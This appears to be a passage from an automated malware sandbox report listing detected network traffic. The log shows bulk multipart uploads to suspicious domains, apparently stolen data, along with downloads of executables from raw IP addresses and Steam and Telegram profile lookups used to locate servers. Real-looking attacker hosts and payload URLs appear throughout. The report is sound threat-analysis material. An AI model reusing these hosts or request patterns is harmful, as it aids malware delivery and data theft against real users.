Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9Y3G6RDPFCCWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15041Host: warlikedbeliev.org
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4L8ZT531S96TTMNRTTLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20573Host: warlikedbeliev.org
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=P8KG3582KPVNZN0FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2558Host: warlikedbeliev.org
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9SAGL6KTPS6602YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586686Host: warlikedbeliev.org
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: warlikedbeliev.org
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: toppyneedus.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: toppyneedus.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DJZ4HCWZ72NQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12798Host: toppyneedus.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GXMNCZ204Y2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15034Host: toppyneedus.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YIPG464PU41GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20530Host: toppyneedus.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WSQIAJ7QDN82AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2561Host: toppyneedus.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G8THBH47ERTKG967HMJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586175Host: toppyneedus.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: toppyneedus.biz
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----s0h4wlx47y5pzus0hlxbUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 254Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----pph47ymgdtrim7glng4oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----00zcb16x4790zuknglngUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----37q1nohlnycbieu3eu3oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----xt26fcj5fukx4790zukfUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 6241Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----dtjm79rq1vs2v3o8q16fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 489Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2dbas0zm7y5pzmglfua1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 505Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----j5xtjwtr9zctjmohl68yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 213453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----j5xtjwtr9zctjmohl68yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 55081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----wb1v3op8ymym7ymgd2n7User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 142457Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----sjmo89rqieuaaasj5pp8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 493Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----n7y58q1v3op8qqq1djeuUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 3165Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----trieukfct00zmyusjmymUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 207993Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----s2djmg4wlny58y58gl68User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 68733Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----kf37qimymo89rie3wbimUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 262605Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----p8gd2n79hdb1vas00z58User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 393697Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----gd2vasr168glnyu3ophvUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 131557Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----hvai5f3ekf37qqqi5xlxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 6990993Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4ozm7y5x4e3ozmo8qq9hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2noh4ekngvaieusj5890User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2vs2djekf37qqqq90r1dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 1837Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----26fu3ekf37qie37y5fusUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 1825Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2vs2djekf37qqqq90r1dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 1837Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----5phvai5f3ekf37qqqi5xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 1837Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2vs26f3eua1v3790hvasUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 1825Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----26xb16pzua1vaasj5phvUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 1837Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----gln7ym79ri58qqi5phdbUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 1825Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----5xtr16xtri5fu3wl6x4eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 1825Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7y5pzmohvs0rimglnym7User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----qi5xt2dj5ph4e3euk6xbUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 98273Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----wbsjmyuaiwtrie3ozukfUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----tj58q1v3wtjw47qq9zu3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----qi5xt2dj5ph4e3euk6xbUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 254Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0rqq1ny5fukxbiwb1djeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----qqi5xlxt00zuaaasr90rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----iwlf3oph4o8gv3wbiekfUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----vsj5xtj5xbie37q1noppUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 6761Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----zcjmoppph4euaiek6phlUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 489Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----5fus0r1v3ectjekx4wlnUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 9625Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----5ppzmop8g4wln7g4wbi5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 213453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----k6xl6fk6x4wtje3wlnglUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 55081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----2djmo8g4ect2nymophdtUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 142457Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----s2v3ozukfkxtrq9z5f3eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 493Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----9zmy5xtj5xbimyusrimoUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 12553Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----dtjmy5fkxba1n7ym79zmUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 207993Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----v37q1nohlnycbieu3eu3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 68733Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----zctrq9r1vkf3eu3ozct0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 262605Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----s2va1no8glnymy58gl6fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 393697Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ymo89rim79hvaasr9hv3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 131557Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----djecbi5fkfusrqq9zmycUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 6990993Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----89hd2dtje3oh4ekfknopUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ohvs0rimglnym79zmgdjUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouContent-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe

Code function: 4_2_0012E0C0 recv,recv,recv,recv,

4_2_0012E0C0

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=fad231852a23212aa4_14628175053678802113
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /files/sunnywebZ/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /boom/tvhaqk.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /boom/uykb.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42
Source: global traffic	HTTP traffic detected: GET /files/initlosizz198hyjdr/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

